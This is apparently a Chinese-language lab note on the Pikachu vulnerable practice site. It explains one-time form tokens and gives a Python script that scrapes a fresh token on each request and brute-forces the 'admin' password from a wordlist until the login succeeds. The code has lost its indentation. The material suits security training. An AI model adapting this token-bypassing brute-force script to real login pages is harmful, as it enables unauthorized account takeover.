token 的原理是在前端生成token值,然后返回给服务端,后面用户提交表单的时候,把token一并提交给服务端,进行比对,token是一次性的,用一次就随机生成一个
在头文件包中一定要加User-Agent与cookie!!!
import requests
url = "http://192.168.152.128:8001/vul/burteforce/bf_token.php"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36",
"cookie":"PHPSESSID=h2bkgcml7vdu8e84qnp59legc6"
}
with open(input("Passwd_File_Path >> "), "r") as file:
for _ in file:
response = requests.get(url=url,headers=headers)
strlen = len('<input type="hidden" name="token" value="')
local = response.text.index('<input type="hidden" name="token" value="')
tokenlen = len("6384366f7641e94051799990589")
token = response.text[local+strlen:local+strlen+tokenlen].strip()
data = {
"username":"admin",
"password":_.strip(),
"token":token,
"submit": "Login"
}
respost = requests.post(url=url, headers=headers, data=data)
if "login success" in respost.text:
print(f"login: admin\npasswd: {_.strip()}")
break